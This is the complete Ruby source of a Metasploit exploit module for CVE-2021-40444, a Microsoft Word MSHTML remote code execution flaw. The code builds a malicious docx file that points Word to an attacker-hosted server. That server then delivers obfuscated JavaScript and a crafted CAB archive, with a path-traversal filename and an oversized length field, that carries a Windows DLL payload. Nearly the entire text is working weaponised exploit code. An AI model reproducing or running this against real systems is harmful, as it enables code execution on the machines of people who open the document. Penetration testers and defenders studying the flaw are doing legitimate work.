Microsoft Office Word MSHTML Remote Code Execution

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::FILEFORMAT  
include Msf::Exploit::Remote::HttpServer::HTML  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Microsoft Office Word Malicious MSHTML RCE',  
'Description' => %q{  
This module creates a malicious docx file that when opened in Word on a vulnerable Windows  
system will lead to code execution. This vulnerability exists because an attacker can  
craft a malicious ActiveX control to be used by a Microsoft Office document that hosts  
the browser rendering engine.  
},  
'References' => [  
['CVE', '2021-40444'],  
['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444'],  
['URL', 'https://www.sentinelone.com/blog/peeking-into-cve-2021-40444-ms-office-zero-day-vulnerability-exploited-in-the-wild/'],  
['URL', 'http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf'],  
['URL', 'https://github.com/lockedbyte/CVE-2021-40444/blob/master/REPRODUCE.md'],  
['URL', 'https://github.com/klezVirus/CVE-2021-40444']  
],  
'Author' => [  
'lockedbyte ', # Vulnerability discovery.  
'klezVirus ', # References and PoC.  
'thesunRider', # Official Metasploit module.  
'mekhalleh (RAMELLA Sébastien)' # Zeop-CyberSecurity - code base contribution and refactoring.  
],  
'DisclosureDate' => '2021-09-23',  
'License' => MSF_LICENSE,  
'Privileged' => false,  
'Platform' => 'win',  
'Arch' => [ARCH_X64],  
'Payload' => {  
'DisableNops' => true  
},  
'DefaultOptions' => {  
'FILENAME' => 'msf.docx'  
},  
'Targets' => [  
[  
'Hosted', {}  
]  
],  
'DefaultTarget' => 0,  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [UNRELIABLE_SESSION],  
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]  
}  
)  
)  
  
register_options([  
OptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true])  
])  
register_advanced_options([  
OptPath.new('DocxTemplate', [ false, 'A DOCX file that will be used as a template to build the exploit.' ]),  
])  
end  
  
def bin_to_hex(bstr)  
return(bstr.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join)  
end  
  
def cab_checksum(data, seed = "\x00\x00\x00\x00")  
checksum = seed  
  
bytes = ''  
data.chars.each_slice(4).map(&:join).each do |dword|  
if dword.length == 4  
checksum = checksum.unpack('C*').zip(dword.unpack('C*')).map { |a, b| a ^ b }.pack('C*')  
else  
bytes = dword  
end  
end  
checksum = checksum.reverse  
  
case (data.length % 4)  
when 3  
dword = "\x00#{bytes}"  
when 2  
dword = "\x00\x00#{bytes}"  
when 1  
dword = "\x00\x00\x00#{bytes}"  
else  
dword = "\x00\x00\x00\x00"  
end  
  
checksum = checksum.unpack('C*').zip(dword.unpack('C*')).map { |a, b| a ^ b }.pack('C*').reverse  
end  
  
# http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf  
def create_cab(data)  
cab_cfdata = ''  
filename = "../#{File.basename(@my_resources.first)}.inf"  
block_size = 32768  
struct_cffile = 0xd  
struct_cfheader = 0x30  
  
block_counter = 0  
data.chars.each_slice(block_size).map(&:join).each do |block|  
block_counter += 1  
  
seed = "#{[block.length].pack('S')}#{[block.length].pack('S')}"  
csum = cab_checksum(block, seed)  
  
vprint_status("Data block added w/ checksum: #{bin_to_hex(csum)}")  
cab_cfdata << csum # uint32 {4} - Checksum  
cab_cfdata << [block.length].pack('S') # uint16 {2} - Compressed Data Length  
cab_cfdata << [block.length].pack('S') # uint16 {2} - Uncompressed Data Length  
cab_cfdata << block  
end  
  
cab_size = [  
struct_cfheader +  
struct_cffile +  
filename.length +  
cab_cfdata.length  
].pack('L<')  
  
# CFHEADER (http://wiki.xentax.com/index.php/Microsoft_Cabinet_CAB)  
cab_header = "\x4D\x53\x43\x46" # uint32 {4} - Header (MSCF)  
cab_header << "\x00\x00\x00\x00" # uint32 {4} - Reserved (null)  
cab_header << cab_size # uint32 {4} - Archive Length  
cab_header << "\x00\x00\x00\x00" # uint32 {4} - Reserved (null)  
  
cab_header << "\x2C\x00\x00\x00" # uint32 {4} - Offset to the first CFFILE  
cab_header << "\x00\x00\x00\x00" # uint32 {4} - Reserved (null)  
cab_header << "\x03" # byte {1} - Minor Version (3)  
cab_header << "\x01" # byte {1} - Major Version (1)  
cab_header << "\x01\x00" # uint16 {2} - Number of Folders  
cab_header << "\x01\x00" # uint16 {2} - Number of Files  
cab_header << "\x00\x00" # uint16 {2} - Flags  
  
cab_header << "\xD2\x04" # uint16 {2} - Cabinet Set ID Number  
cab_header << "\x00\x00" # uint16 {2} - Sequential Number of this Cabinet file in a Set  
  
# CFFOLDER  
cab_header << [ # uint32 {4} - Offset to the first CFDATA in this Folder  
struct_cfheader +  
struct_cffile +  
filename.length  
].pack('L<')  
cab_header << [block_counter].pack('S<') # uint16 {2} - Number of CFDATA blocks in this Folder  
cab_header << "\x00\x00" # uint16 {2} - Compression Format for each CFDATA in this Folder (1 = MSZIP)  
  
# increase file size to trigger vulnerability  
cab_header << [ # uint32 {4} - Uncompressed File Length ("\x02\x00\x5C\x41")  
data.length + 1073741824  
].pack('L<')  
  
# set current date and time in the format of cab file  
date_time = Time.new  
date = [((date_time.year - 1980) << 9) + (date_time.month << 5) + date_time.day].pack('S')  
time = [(date_time.hour << 11) + (date_time.min << 5) + (date_time.sec / 2)].pack('S')  
  
# CFFILE  
cab_header << "\x00\x00\x00\x00" # uint32 {4} - Offset in the Uncompressed CFDATA for the Folder this file belongs to (relative to the start of the Uncompressed CFDATA for this Folder)  
cab_header << "\x00\x00" # uint16 {2} - Folder ID (starts at 0)  
cab_header << date # uint16 {2} - File Date (\x5A\x53)  
cab_header << time # uint16 {2} - File Time (\xC3\x5C)  
cab_header << "\x20\x00" # uint16 {2} - File Attributes  
cab_header << filename # byte {X} - Filename (ASCII)  
cab_header << "\x00" # byte {1} - null Filename Terminator  
  
cab_stream = cab_header  
  
# CFDATA  
cab_stream << cab_cfdata  
end  
  
def generate_html  
uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.cab"  
inf = "#{File.basename(@my_resources.first)}.inf"  
  
file_path = ::File.join(::Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve_2021_40444.js')  
js_content = ::File.binread(file_path)  
  
js_content.gsub!('REPLACE_INF', inf)  
js_content.gsub!('REPLACE_URI', uri)  
if datastore['OBFUSCATE']  
print_status('Obfuscate JavaScript content')  
  
js_content = Rex::Exploitation::JSObfu.new js_content  
js_content = js_content.obfuscate(memory_sensitive: false)  
end  
  
html = '<!DOCTYPE html><html><head><meta http-equiv="Expires" content="-1"><meta http-equiv="X-UA-Compatible" content="IE=11"></head><body><script>'  
html += js_content.to_s  
html += '</script></body></html>'  
html  
end  
  
def get_file_in_docx(fname)  
i = @docx.find_index { |item| item[:fname] == fname }  
  
unless i  
fail_with(Failure::NotFound, "This template cannot be used because it is missing: #{fname}")  
end  
  
@docx.fetch(i)[:data]  
end  
  
def get_template_path  
datastore['DocxTemplate'] || File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve-2021-40444.docx')  
end  
  
def inject_docx  
document_xml = get_file_in_docx('word/document.xml')  
unless document_xml  
fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/document.xml')  
end  
  
document_xml_rels = get_file_in_docx('word/_rels/document.xml.rels')  
unless document_xml_rels  
fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels')  
end  
  
uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html"  
@docx.each do |entry|  
case entry[:fname]  
when 'word/document.xml'  
entry[:data] = document_xml.to_s.gsub!('TARGET_HERE', uri.to_s)  
when 'word/_rels/document.xml.rels'  
entry[:data] = document_xml_rels.to_s.gsub!('TARGET_HERE', "mhtml:#{uri}!x-usc:#{uri}")  
end  
end  
end  
  
def normalize_uri(*strs)  
new_str = strs * '/'  
  
new_str = new_str.gsub!('//', '/') while new_str.index('//')  
  
# makes sure there's a starting slash  
unless new_str[0, 1] == '/'  
new_str = '/' + new_str  
end  
  
new_str  
end  
  
def on_request_uri(cli, request)  
header_cab = {  
'Access-Control-Allow-Origin' => '*',  
'Access-Control-Allow-Methods' => 'GET, POST, OPTIONS',  
'Cache-Control' => 'no-store, no-cache, must-revalidate',  
'Content-Type' => 'application/octet-stream',  
'Content-Disposition' => "attachment; filename=#{File.basename(@my_resources.first)}.cab"  
}  
  
header_html = {  
'Access-Control-Allow-Origin' => '*',  
'Access-Control-Allow-Methods' => 'GET, POST',  
'Cache-Control' => 'no-store, no-cache, must-revalidate',  
'Content-Type' => 'text/html; charset=UTF-8'  
}  
  
if request.method.eql? 'HEAD'  
if request.raw_uri.to_s.end_with? '.cab'  
send_response(cli, '', header_cab)  
else  
send_response(cli, '', header_html)  
end  
elsif request.method.eql? 'OPTIONS'  
response = create_response(501, 'Unsupported Method')  
response['Content-Type'] = 'text/html'  
response.body = ''  
  
cli.send_response(response)  
elsif request.raw_uri.to_s.end_with? '.html'  
print_status('Sending HTML Payload')  
  
send_response_html(cli, generate_html, header_html)  
elsif request.raw_uri.to_s.end_with? '.cab'  
print_status('Sending CAB Payload')  
  
send_response(cli, create_cab(@dll_payload), header_cab)  
end  
end  
  
def pack_docx  
@docx.each do |entry|  
if entry[:data].is_a?(Nokogiri::XML::Document)  
entry[:data] = entry[:data].to_s  
end  
end  
  
Msf::Util::EXE.to_zip(@docx)  
end  
  
def unpack_docx(template_path)  
document = []  
  
Zip::File.open(template_path) do |entries|  
entries.each do |entry|  
if entry.name.match(/\.xml|\.rels$/i)  
content = Nokogiri::XML(entry.get_input_stream.read) if entry.file?  
elsif entry.file?  
content = entry.get_input_stream.read  
end  
  
vprint_status("Parsing item from template: #{entry.name}")  
  
document << { fname: entry.name, data: content }  
end  
end  
  
document  
end  
  
def primer  
print_status('CVE-2021-40444: Generate a malicious docx file')  
  
@proto = (datastore['SSL'] ? 'https' : 'http')  
if datastore['SRVHOST'] == '0.0.0.0'  
datastore['SRVHOST'] = Rex::Socket.source_address  
end  
  
template_path = get_template_path  
unless File.extname(template_path).match(/\.docx$/i)  
fail_with(Failure::BadConfig, 'Template is not a docx file!')  
end  
  
print_status("Using template '#{template_path}'")  
@docx = unpack_docx(template_path)  
  
print_status('Injecting payload in docx document')  
inject_docx  
  
print_status("Finalizing docx '#{datastore['FILENAME']}'")  
file_create(pack_docx)  
  
@dll_payload = Msf::Util::EXE.to_win64pe_dll(  
framework,  
payload.encoded,  
{  
arch: payload.arch.first,  
mixed_mode: true,  
platform: 'win'  
}  
)  
end  
end  
`